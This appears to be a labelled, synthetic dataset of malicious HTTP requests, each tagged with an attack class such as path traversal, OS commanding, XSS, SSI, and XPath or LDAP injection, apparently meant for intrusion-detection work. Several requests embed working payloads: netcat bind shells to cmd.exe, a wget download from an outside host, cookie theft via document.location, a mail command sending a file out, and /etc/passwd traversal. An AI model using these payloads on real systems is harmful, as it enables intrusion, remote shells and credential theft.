Referer: /baicpSv/7dmi/ewrih/fdawnv/5petssp.pl
TE: trailers,trailers,trailers
Trailer: TE
User-Agent: Mozilla/9.6 (Windows; U; Win98 1.8; 51-ee; rv:3.2.7) Gecko/31330865
UA-CPU: Sparc
UA-Disp: 533,709,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 141x150
Via: 5.8 247.139.176.224, 7.8 247.164.233.75:595, 3.1 240.64.123.239
Transfer-Encoding: deflate
Upgrade: erfnao/0.7, dvsc/8.6, orulO/6.4, neHfs9/5.4
Warning: 697 www.tnvqh2e6.htm "e6errrusNrmas" "Sun, 18 Jan 09 24:57:04 UTC"
X-Forwarded-For: 39.109.32.203
X-Serial-Number: 344502670791536
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48404
Start - Id: 44866
class: PathTransversal
GET /wlhkO/b0Bj/u0log9GqcZQ/iRj0/hA-7/ooOKR6ke8Th/I_r7DrmK_C.png?hZLlswalltNPEM=04424374&nesw=hrdu+&C0iga=a1udst&cdE0hi=i+r&ieangeap9=+f&HFb3g=%40&nLomdceltagr=sBUfOPyZF6X&alqrvaemeeelhae=99126&r9hE=inxsdsuitrodIbg&whnk7L3l=uaccess_logr&qttzzbr=file%3A%2F%2F%2Fb%3A%2Fokhn%2Fy4%2Fh7l6ste5.xml&Gdrm3=tshutdown%3BrG&NNwindow.openG=tpsoennT0s0bsp&cIgee8dasyaa=hr+aeemhe8i8aw HTTP/1.0
Host: 250.224.208.45
Connection: tsYOeSts
Accept: image/*, text/*, image/jpeg
Accept-Charset: x-mac-roman, big5
Accept-Encoding: 
Accept-Language: nen3o-ettxt;q=0.8
Cache-Control: only-if-cached
Client-ip: 17.82.53.2
Cookie: UimOtoYnIe=n1;Esct=98722;fpeioidrtTrrh=ce6cvarnywget;Ieawindow.open=shutdown+9rt
Cookie2: $Version="27"
Date: Mon, 19 Jan 09 20:07:28 UTC
ETag: W/"nsiYidPN0u_h7kX4yYi"
Expect: 100-continue
From: US7hhasu@rOhoendv.it
If-Modified-Since: Sun, 05 Feb 06 03:07:51 UTC
If-Unmodified-Since: Sat, 09 Aug 08 23:07:53 CET
If-Match: "pmfY041lx7FgKFTLov"
If-None-Match: "UunXHK8cxJ-@RnFOhpj"
If-Range: *
Max-Forwards: 97
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: boirwt l8nta=oels3is
Authorization: Basic bmdwbzpjc3RMbWU=
Range: 165-47102,-98
Referer: http://aTsal.ch/felS/swEzl/yoeha.mp3
TE: trailers,deflate
Trailer: Referer
User-Agent: Mozilla/4.2 (compatible; Konqueror/4.0; Open BSD i586; Ssynqeaja)
UA-CPU: PowerPC
UA-Disp: 280,070,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 458x842
Via: 1.3 www.pseesld.js
Transfer-Encoding: compress
Upgrade: taswen/8.6, 6o7td/4.7, soc/6.3
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 14283566548757550982
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44866
Start - Id: 49713
class: XPathInjection
GET /_tN/uH.sMdGT.htm?ttc4=itewwfr%27+++or+++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++or+++%273hsbi%27++%3D+++%27 HTTP/1.1
Host: 153.207.157.155
Connection: keep-alive
Accept: application/*, video/quicktime;q=0.9, image/*;q=0.1
Accept-Charset: *
Accept-Encoding: compress;q=0.5, gzip;q=0.2
Accept-Language: la7Tutm-xt3S, lras-Leytmirr;q=0.1, e7e5g-l
Cache-Control: max-age=82377
Client-ip: 108.36.71.41
Cookie: eyEEE=rimf
Cookie2: $Version="8"
Date: Thu, 10 Sep 09 04:56:59 GMT
ETag: W/"oYJL@TFrEJIV.RIT"
Expect: eTteO
From: Etbaese@jwshhAoe.net
If-Modified-Since: Sun, 07 Jan 07 08:41:44 GMT
If-Unmodified-Since: Sat, 28 May 05 15:34:13 CET
If-Match: "LDRsLASJMFBQmg9d9rcb"
If-None-Match: *
If-Range: "0AM5csY0qWyPZZ34bl"
Max-Forwards: 9
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="iest9re"
Authorization: Digest nonce
Range: 74-4,110349-,51246-
Referer: /wnaweslp.asp
TE: gzip;q=0.4,chunked,gzip
Trailer: If-Modified-Since
User-Agent: Mozilla/3.0 (Machintosh; U; PPC Mac OS X 0.2; aW-n0; rv:6.3.6) Gecko/88007794
UA-CPU: StrongARM
UA-Disp: 731,8185,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6094x1402
Via: 9.0 www.abzG0nCs.js
Transfer-Encoding: lior4
Upgrade: hdoAgi/1.2, icsn/0.8, don/0.5
Warning: 018 www.iupl6.jpg "b3zD8yiorsn" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 9273829516846529
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49713
Start - Id: 42806
class: OsCommanding
GET /s81sodvrrdnlsosh/iz5vkNjkSHrf/ddropSSOdropOeaccess_logrV/a8/iXJI0-PTEubO08/jc/bDc3fs/e4PzX/wIZbsamFbgsoundinclude-7/fnCuft/Uoeaelis7habxlsn/qPGw6b.js?Rceeat6sse=650656&6snnr6pfsnkccir=vsesehg&ezineo=tt&aafoSn=priex&ZSUc_vbscript-n=2pM5XM&us7=647534 HTTP/1.1
Host: 162.0.233.88:80
Connection: keep-alive
Accept: application/*, application/zip, audio/basic;q=0.1
Accept-Charset: windows-1257
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 249.61.233.64
Cookie: .xeXQSinsertub=|     shell(  "cmd    /c   c:InetpubwwwrootMSISSnc.exe    -l  -p 9703 -t    -e cmd.exe"   )    |     ';vdnafckMtdt5=1;smdtwtl=gsen23
Cookie2: $Version="13"
Date: Wed, 23 Nov 05 15:36:09 GMT
ETag: W/"jxb8oIIxYWQDUNWfk5P4"
Expect: 100-continue
From: r3he@eietc0ehd.com
If-Modified-Since: Wed, 06 Feb 08 19:58:28 CET
If-Unmodified-Since: Fri, 22 Apr 05 13:11:29 CET
If-Match: "ch-aZkzRGKnBzvy8k3JV"
If-None-Match: *
If-Range: Fri, 03 Feb 06 03:57:58 CET
Max-Forwards: 01
Pragma: 24hou='Errdh'
Proxy-Authorization: Basic ZW9laWl0Om9oZW5l
Authorization: NTLM bzQ0ZXFzYk50bnVxbmVzaG5EdHZtc3IzaHdkdHJ0blNTdG5tTlFvYzJyZWNVQWxn
Range: 287246-6
Referer: /ccneEkec/meLk/h4ReTni/hapelvde.htm
TE: trailers,trailers
Trailer: Referer
User-Agent: Mozilla/2.4 (Windows; U; WinNT 8.9; e3-hI; rv:7.4.0) Gecko/11783682
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 1083x618
Via: 1.9 32.252.166.134, FTP/3.6 www.aceNr.htm, FTP/2.9 www.neugsdo.css
Transfer-Encoding: identity
Upgrade: iell/1.7, qpcsne/6.6, auye/3.7
Warning: 727 180.5.166.93 "natzsnhc0Lpart" "Fri, 12 Jan 07 03:50:10 CET"
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42806
Start - Id: 40173
class: SSI
GET /uV.css?79wimrelpisWe=+&udvlii=1t5%3Ad&uh=x&nEdbavjaf=umservicesz&kegejns7p=3&lswtOa1=715208&eeo=8058317&oat8=%3C%21--+%23exec+cmd%3D%22%2Fbin%2Fls+++++-l+++++%2Fhome%2FetiN0a%2F0cPsRi%22+--%3E&a6dEtarh=1&tzaeeylsr=iw-tmpQ&ea=9ngeimzsTnlt9iartl&KtkgR9nniud9=wM0uzGGWeK HTTP/1.0
Host: www.0havtfl.org:39
Connection: keep-alive
Accept: */*
Accept-Charset: gb2312;q=0.3, iso-8859-3, x-mac-greek;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: usfrr='tala8wn'
Client-ip: 34.79.0.86
Cookie: VIItzQJqgroup byphplT=s.K.R;max=ft;lku1=m+ae;n5it4cgimtb=569
Cookie2: $Version="360"
Date: Sat, 10 Jun 06 19:59:58 UTC
ETag: W/"k_aCPWy5XqeILlOdj5S"
Expect: 100-continue
From: min0e4tn@ehtETuft.cz
If-Modified-Since: Sun, 16 Aug 09 10:37:05 UTC
If-Unmodified-Since: Wed, 01 Apr 09 15:43:32 CET
If-Match: *
If-None-Match: "1X-LJfWF9XstIzg0jdi"
If-Range: Wed, 30 Aug 06 04:36:55 GMT
Max-Forwards: 4
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic cGNuY3Njczplbm9ybTQ=
Authorization: tsnral ysei=dtieashn
Range: 85-
Referer: /rTmr/owin2ts.pl
TE: trailers
Trailer: Warning
User-Agent: rteiswWw
UA-CPU: StrongARM
UA-Disp: 832,4615,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8851x316
Via: 9.8 154.53.61.146, vtgnCf/5.0 124.110.72.52:0537, 5.0 205.206.178.248:5
Transfer-Encoding: wseh
Upgrade: jil/6.4, nmatei/2.7, 8mb/9.3, iejhA/3.6
Warning: 617 www.aa0efg.png "i7eeeyweupihp0u" 
X-Forwarded-For: 237.110.243.93
X-Serial-Number: 06191135820
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40173
Start - Id: 38500
class: LdapInjection
GET /FD/m6Meweaw1ftspt/8H-Or7h/n8Ic/oieiwsdodThsa/tewEAYBhqservicesxVFW/B.Tr4LCLP6/eooo/gSL_mEf.JBZ2zyl7j/uanviz8/sNe54l.asp?u.xtermRp=6764952&eteis1icuzyei=%29++++%28++++%7C+%28aOoz3%3Dr7vr*%29 HTTP/1.1
Host: www.emeintanle.be
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1252;q=0.8
Accept-Encoding: *
Accept-Language: i-o7t, dec-oe0eo6;q=0.7
Cache-Control: no-transform
Client-ip: 13.141.85.224
Cookie: yg8tT6h=65;_8RnH=eftas<cSopensehrsetc;3toh=rgEyx2;weerccTgsan568t=tstaee0ettt8iit;snH7h=@g|madmiouit8 shutdownr2;-q9B3=8P3y=a\vpositionagroup byohAr]all@5
Cookie2: $Version="61"
Date: Fri, 07 Apr 06 19:17:02 GMT
ETag: "@oxpL@CZ7HOtjkNK"
Expect: 100-continue
From: eorT@elrAedmeoy.biz
If-Modified-Since: Sun, 10 Aug 08 15:51:51 CET
If-Unmodified-Since: Tue, 31 Jul 07 16:58:38 CET
If-Match: "IJqB1I3ZTGt5oNCoh"
If-None-Match: *
If-Range: Fri, 13 Aug 04 02:50:40 UTC
Max-Forwards: 3
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic ZWxlZmczcjU6Y3NhemQzaXU=
Authorization: Digest username="fphe"
Range: -0833,-044
Referer: /uesahn/e9reS.html
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/2.9 (compatible; MSIE 4.7; Linux i586; yimaiep; Im09l)
UA-CPU: 68000
UA-Disp: 299,3970,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 9397x4761
Via: 9.3 www.txnpbisi.png
Transfer-Encoding: identity
Upgrade: hiE/0.7, ube/1.1
Warning: 802 67.80.132.59 "ootesotn" "Fri, 23 Jun 06 21:53:41 CET"
X-Forwarded-For: 226.59.112.50
X-Serial-Number: 66891
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38500
Start - Id: 36729
class: OsCommanding
GET /rrtiEsc/sdQf/a1Dm1u/atel35lrt8ctby/TTopenu-jNuuQL/se.gif?Path6cta=%22++++%3B++%2Fusr%2Fbin%2Fwget+++www.lenemaisan.com%2Fmaasri%3B HTTP/1.1
Host: www.oue2i5.gov:80
Connection: etaE
Accept: */*;q=0.8
Accept-Charset: x-mac-cyrillic, windows-1254;q=0.0, euc-tw;q=0.0, big5
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 38.98.48.204
Cookie: MdUY7Zgc7e=dKs;enn=tSDb
Cookie2: $Version="6"
Date: Thu, 22 Jan 04 14:54:14 UTC
ETag: W/"ED3bEWlrdsC7qV@8t"
Expect: ivhahey
From: uehzS@rs1ylsy5.ch
If-Modified-Since: Mon, 18 Feb 08 11:55:50 CET
If-Unmodified-Since: Mon, 29 May 06 12:53:58 GMT
If-Match: "7.FLD_rMMQLXTAnYw"
If-None-Match: *
If-Range: Tue, 13 Nov 07 21:33:29 CET
Max-Forwards: 17
MIME-Version: 6.4
Pragma: ue='rvreoynt'
Proxy-Authorization: Basic bVhudGVvbDplU3Rtc3I=
Authorization: Digest response="18BBA6CC47843347fa6D8aeE033EC1Fd"
Range: -47510,582-0
Referer: http://www.iynsmcoY.st/stntdesi/acits/Booyiiar/icgup/oo0e.swf
TE: gzip,trailers,deflate
Trailer: Cache-Control
User-Agent: 65_jtr http://www.soedqa.com
UA-CPU: Sparc
UA-Disp: 8267,5613,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 402x4966
Via: FTP/1.9 www.a8n6pa.css:5012
Transfer-Encoding: compress
Warning: 028 www.eo6itwta.css "IsnphdAiybeogei" "Tue, 31 Aug 04 23:00:46 GMT"
X-Forwarded-For: 135.18.204.64
X-Serial-Number: 5966336
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36729
Start - Id: 47239
class: XSS
GET /noM/N_x_APoNsRd_/eZNulIDM/xi7/b0Sdvmn/nj.GRsS1AAbp/ior/sAat3qstsaptbcNsr/o5mee.tiff?8nfqtsfoa=uniono3telnetIieobject&Uwp-sJlV3trx=8392741108&Otetth=r&Hdeoinnj=AX&Omlynoeoe=lm-perl&f1mbb5t=edVzVYu&Z0-HL=%26%7B%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.alme.com%2Fcgi-bin%2Ftrleti.cgi%27%2Bdocument.cookie%29%3B%5D%7D%3B&re=pOio3TSUCE&apunsy1i=eoehS&AmvNf6M=dihkvt4et3ied&unErf=pu3r0aegdwc&Arei=nmoa24rduwawvydth&pbfnnimicnjlo=62822 HTTP/1.1
Host: 24.110.16.94:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-greek, x-mac-hebrew, iso-8859-8-i, x-mac-korean;q=0.6, iso-8859-3
Accept-Encoding: gzip, identity;q=0.1
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 198.38.107.198
Cookie: r6u=4639566;j0YdzUHM70=3;ioe39=l;i1desrbrmu1o=yhNq =gnSm-t 3between;biGlHnt=t2:
Cookie2: $Version="152"
Date: Sun, 21 Jun 09 09:36:04 UTC
ETag: "5vTe1bZxzLc.pyDKOkp."
Expect: 100-continue
From: tn3sewe3@0thzlo.uk
If-Modified-Since: Tue, 17 Apr 07 06:41:05 CET
If-Unmodified-Since: Sun, 03 Jan 10 16:47:59 GMT
If-Match: *
If-None-Match: "Z4LV9FHYLJ8Svn8ND"
If-Range: *
Max-Forwards: 7601
MIME-Version: 8.0
Pragma: Rrohe=sortdt1h
Proxy-Authorization: Basic bWFjaTpEZ2hlTQ==
Authorization: Digest nc=CE4BddfB
Range: -3
Referer: http://www.saablao.st/ekB5e0T.ace
TE: gzip;q=0.7,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/8.7 (X11; U; Solaris 6.7; 3p-9g; rv:3.8.9) Gecko/38734008
UA-CPU: 68000
UA-Disp: 390,072,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 077x3740
Via: 2.0 www.rnTr.js:495, 3.8 www.ttbkue.jpg
Transfer-Encoding: gzip
Upgrade: ebpgud/5.5, uo6ys/3.0, eeei/3.0, wOU/7.9
Warning: 011 www.oca0haoj.js:3920 "uneuy500c" 
X-Forwarded-For: 230.35.184.69
X-Serial-Number: 81818061997454
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47239
Start - Id: 49066
class: XPathInjection
GET /cDUv9MQANzILfS_UgMy/nfqomRtamtAneodctqE/passwdLSI8boot.iniub/nMrNWHIT5Dk_Co/DNTpanh3e/3echo_uHT6p8O/4aogrmknxrht/ryy4Zo7INYrE.8/lsebts/dnmeasrSlnfaxn0rrc/tWHfr6maHtxioEnnTt.mspx?k@9K3=874++++or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or++175%3D&Jylnan5tym=x8y&cctovaaSje=f2NNx5e&BkJ2r3=053957121&EtqPs=884534&x3l3T=xBy7rcooea5&dAp=iZZek2HXJF&eae3hwe8er=47479213&eeaf=ifr&7jttoiaoattowHt=23793&mSosYI=msiframeo&cEedefhaSeo2ito=%2Bxtf&9a=sa%40%29s&dndb=314 HTTP/1.1
Host: 40.19.38.6
Connection: lu5ooHcc
Accept: text/plain, application/*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 164.173.183.167
Cookie: 6ynto3d4=W l-eN;g8NaG_fFWand0@=nrudnoon;dYPKU=%e'%=roteia t gqniwp-;awnno=258584
Cookie2: $Version="84"
Date: Tue, 11 May 04 14:47:31 GMT
ETag: "91bonU_8hX5Lp8pQC"
Expect: 100-continue
From: oT4sie@pMej.gov
If-Modified-Since: Sat, 10 Apr 04 06:18:55 CET
If-Unmodified-Since: Sun, 09 Jan 05 02:32:17 CET
If-Match: "sStgjOQPpH2mAv."
If-None-Match: *
If-Range: "8WcuBMDm2pIipGgVD"
Max-Forwards: 3640
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: NTLM Y3FhZWFobWFmYW5BaGRlZHRlb3Jhc2xhZTluR2xEdmxkVWNuaEl0ZW92cw==
Authorization: Basic OWhpZDphd3RocGVhNQ==
Range: -4,-1070,-459610
Referer: /oaaT/4evlcdrr/oeth3.pdf
TE: trailers,trailers,gzip
Trailer: Date
User-Agent: wothn5nnelst17ew
UA-CPU: x86
UA-Disp: 470,303,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7313x7197
Via: FTP/8.8 www.iuates.htm, HTTP/9.3 243.159.36.87:4755
Transfer-Encoding: 46Gbd
Upgrade: ne0d/6.8, b5on/7.9, gcX8/0.6, bci/5.8, ibw/8.8
Warning: 069 www.eoApA.tiff "paahksminehn7lr6TE" "Wed, 28 Oct 09 15:16:56 CET"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 509527
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49066
Start - Id: 42883
class: OsCommanding
GET /zdincludeexec/uhidl5g/we9L3xY@k6.php4?U1-E-OandG=nm%7C%5Cdmhhr%29eftpaih&eellscolo2kel=7864833&.Yvf090aincludeS=%7C+shell%28++++%22cmd+++++%2Fc+++++c%3AInetpubwwwrootMSISSnc.exe++++-l+-p+5021+++++-t++-e+++++cmd.exe%22%29++++%7C++++%27&er1lev8ittm=8505822243&ZP2K0=074983&rpeoateTsnL=x24nu&IgweddaXadt7=ael%3Fn%40%2Buecoupdatee%7Cn+echo HTTP/1.1
Host: www.sSsroebbon.de
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.7
Accept-Language: eHnzial-adox5m7f;q=0.2
Cache-Control: only-if-cached
Client-ip: 241.68.47.162
Cookie: tottqrih0ceNcie=081784;rrdgo6c=fP5Is;o0ctegtpo=rfsi;lma422losSotrr2=tZC4S.PzH8iM
Cookie2: $Version="443"
Date: Sat, 05 Aug 06 18:06:20 GMT
ETag: "mC@rd8lAtMiE6hU-B"
Expect: 100-continue
From: n2zse0bo@tibsA.uk
If-Modified-Since: Sat, 13 Jun 09 14:38:46 CET
If-Unmodified-Since: Sat, 28 Nov 09 19:04:30 UTC
If-Match: "tBPxzMX@5TxuCk0kzIJX"
If-None-Match: *
If-Range: *
Max-Forwards: 72
MIME-Version: 6.8
Pragma: unf=lUwhyeeg
Proxy-Authorization: NTLM aWRkcWhsaTFkaDVIc2pvZXNoc3J0cmVzeHlldWVCeWVzbg==
Authorization: NTLM b2Fhb1lyYUllaHVlb2V2ZWl1MHVub281ZXFweGJpOGV6ZA==
Referer: /cseaprjy/otsumw/2Yju/gWAb/EtsStq.php3
TE: trailers,deflate;q=0.0
Trailer: Upgrade
User-Agent: Mozilla/9.4 (X11; U; SunOS sun4u 5.1; oU-ed; rv:8.5.3) Gecko/10648194
UA-OS: Win98
UA-Pixels: 4835x5695
Via: HTTP/1.8 www.teoo4rw7.tiff:56, FTP/5.7 41.237.225.35:165
Transfer-Encoding: hstcR; aenausut=sttkd
Upgrade: llre/7.7, ldlseg/5.7
Warning: 973 www.a2Mltbl.jpeg "ycengdeih" "Sun, 20 Nov 05 15:07:42 CET"
X-Serial-Number: 24256159613993344
----: ------------------------------------------------

null

End - Id: 42883
Start - Id: 43976
class: OsCommanding
GET /bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.1
Host: www.yenCdnt.org:408
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: deflate;q=0.5, identity, identity, gzip;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 9.225.171.68
Cookie: ec=67695583;NFU4rlogI=njWpm
Cookie2: $Version="45"
Date: Thu, 27 Apr 06 11:59:41 CET
ETag: W/".M73M1s.vEWh-qdTs"
Expect: 100-continue
From: axenii@lMdner.de
If-Modified-Since: Fri, 23 Sep 05 06:40:53 GMT
If-Unmodified-Since: Sat, 01 May 04 17:53:50 CET
If-Match: *
If-None-Match: "nghSSiXZqI6yCGLjsR.n"
If-Range: *
Max-Forwards: 741
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Qyeeu qzNllaee=zsachi
Authorization: Basic b3NpaDphbnVl
Range: 2873-08
Referer: http://www.nscbit.biz/o3iW.asmx
TE: trailers
Trailer: Referer
User-Agent: newceb/7.8
UA-CPU: x86
UA-Disp: 3500,2136,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2346x026
Via: odna/0.5 www.llklra35.gif, htiw/3.3 www.iygyyfy.jpg:426
Transfer-Encoding: gzip
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 278 147.254.183.64 "ie6mtt" "Mon, 03 Apr 06 21:50:29 CET"
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 0238544076735030129
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43976
Start - Id: 43484
class: OsCommanding
GET /ta9hbsesHox/YKb2GkP9sj2A7gZ/spVMgO06s5H/r8etoag5ondEn6qi.jpeg?Aets4Dmcno=lperls&esxAoywg=8622069666&lnceg=863&0pnsni=488&rcpOYhttpY=8078403840&N11insertNt31Q=mail+++++pllKrjr%40nnk.axbd.gov+++%3C%3C+++%2Ftmp%2Fwu.c+++%3B HTTP/1.1
Host: www.sbn8wa.st
Connection: keep-alive
Accept: application/postscript;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 18.220.32.226
Cookie: tehcortl68gltm=ewkuier;nuouplCneynnet= en-iy2kuehS;reesadoav1oozae=rodqeeilcnreeetyr;nnndmeEa8ihern=dOx;reh=aiesroaEgimeprse
Cookie2: $Version="51"
Date: Mon, 16 Oct 06 01:15:36 UTC
ETag: W/"@K4eB7R86idDJqDsd"
Expect: 100-continue
From: oie3rs@dut5nl3e.uk
If-Modified-Since: Tue, 11 May 04 09:24:52 GMT
If-Unmodified-Since: Tue, 20 Apr 10 11:57:52 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 24 Jan 06 04:20:09 CET
Max-Forwards: 7468
MIME-Version: 0.6
Pragma: h='de'
Proxy-Authorization: Basic dHR3SVJyaWU6ZHJhdGVtOA==
Authorization: snnone tsht4=D3doear
Range: 4-
Referer: /reoXdr/plnee.bin
TE: gzip,trailers,chunked;q=0.9
Trailer: Referer
User-Agent: Mozilla/4.8 (X11; U; Open BSD i386 8.7; fi-Ti; rv:0.4.4) Gecko/01061560
UA-CPU: Sparc
UA-Disp: 6546,0956,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2941x889
Via: 7.9 www.3fdsttd.png
Transfer-Encoding: deflate
Upgrade: whvq9/8.8, onR/9.0, ohe/5.4
Warning: 847 www.0te1.css "ctnpcrbrylblaepn" "Wed, 02 Aug 06 09:38:06 UTC"
X-Forwarded-For: 137.226.116.122
X-Serial-Number: 5600215
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 43484
Start - Id: 38470
class: LdapInjection
GET /sztoelW3nExUoElsQarr/qDJUwp-cwhereDfhavingZ-1/tcxgyxz/n3f.mdb?unthaimirhanen=38%29%28%26%28objectClass%3Dite%29%28%7C%28sn%3Detni%29%28cn%3De+++++J*%29%29&lmuntgguIgagit=TAsahtacceso HTTP/1.0
Host: www.aroimB.it
Connection: close
Accept: video/*;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: iaseuaq-m;q=0.1, hsea-mI, 2revqis-et;q=0.5, lsgeil-j, sSRntw-rhrti;q=0.3
Cache-Control: only-if-cached
Client-ip: 160.111.13.5
Cookie: hmhoeaznnwgso=5429;osAtggxhshee2t=onmjfarumxudo;Etqe=9;ifxt=re;my=19021;pbaeeeuwEeBotl=r7A6aAtzgGM
Cookie2: $Version="554"
Date: Fri, 04 Jun 04 05:33:09 GMT
ETag: W/"vEDWR6w_MB0Mrrjov"
Expect: betmtr=nyjiso;hCgrf6g
From: odvt@tmdyhis.org
If-Modified-Since: Sat, 06 Aug 05 23:56:40 UTC
If-Unmodified-Since: Wed, 30 Nov 05 24:22:49 GMT
If-Match: "YvDv9TrIFAa__EZrGJn"
If-None-Match: "RzuCa6ABr-cdfq4"
If-Range: "kmB87cCqg7ghVVfoR"
Max-Forwards: 206
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: iiEb vcnyig9=nalmt
Authorization: gghrea nefu8rh=Utko
Range: 24-,76759-,-19589
Referer: /fteso/zLxml/sr039p/milyjt/enpnhst.php4
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.9 (compatible; Konqueror/1.0; Windows NT; ttlobhL0e; cmEs4; op2momwpT)
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 632x125
Via: 5.0 www.eilhyt.js:22, 9.7 202.26.190.36
Transfer-Encoding: gzip
Upgrade: Nlohim/6.2, ors/6.8, ine/9.2, aauq/0.7, cvl87u/8.4
Warning: 616 131.165.120.56:1 "csPssf" 
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38470
Start - Id: 46049
class: PathTransversal
GET /bsH7kZe4tsne8e/systemDdNlnwdAobjectJx.K/d5-rkQrkDH_BCq/deoOsrG75naarrgtt/ehXh-CRC@L8o3jLnFA7/aAI_ROUOD/eFU3rNPPurWJe.php? HTTP/1.0
Host: www.sex7maDei.be
Connection: Dfoe
Accept: audio/*
Accept-Charset: euc-tw, windows-1257, iso-8859-8;q=0.0
Accept-Encoding: identity, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 252.1.75.0
Cookie: Ess3to3of=ApsnD;l9Bys1=nhacnenm3cmteota;nZ@QGtQs=hsg;ehdZygjwe=4nudl'ec4t e ehs$aE;exclt1ldari=1;rSftczhdioIss=\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html
Cookie2: $Version="45"
Date: Sat, 21 Aug 04 14:52:47 UTC
Expect: 2lhr0=hnrA;dnlnid4=ymEe
From: noioi@Hnopfds.gov
If-Modified-Since: Tue, 04 May 04 12:08:22 GMT
If-Unmodified-Since: Sun, 16 Apr 06 10:03:47 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 09 Apr 05 19:15:37 UTC
Max-Forwards: 83
Pragma: j2giieq='imciog'
Authorization: Basic dGV0b2FhMTpybmFvRXQ4
Referer: /nEiietMY.php4
TE: chunked,gzip
Trailer: Pragma
User-Agent: lStuXc. http://www.rirqziOa.uk
UA-OS: Solaris
UA-Color: color32
Via: lw8sq/3.6 6.216.231.105, HTTP/4.8 www.im2oh.jpg
Upgrade: domfsc/6.5, zfo9/7.9
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46049
Start - Id: 46157
class: PathTransversal
GET /mep/Eacn2matpanihSehie.swf?nenf5wMt=6inyscript%7CeS&9e6t=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&ulg6uNcoo1h=rCRUMqnxsJ HTTP/1.1
Host: www.otdhpjicl.de
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-japanese, euc-cn
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=349
Client-ip: 172.17.95.67
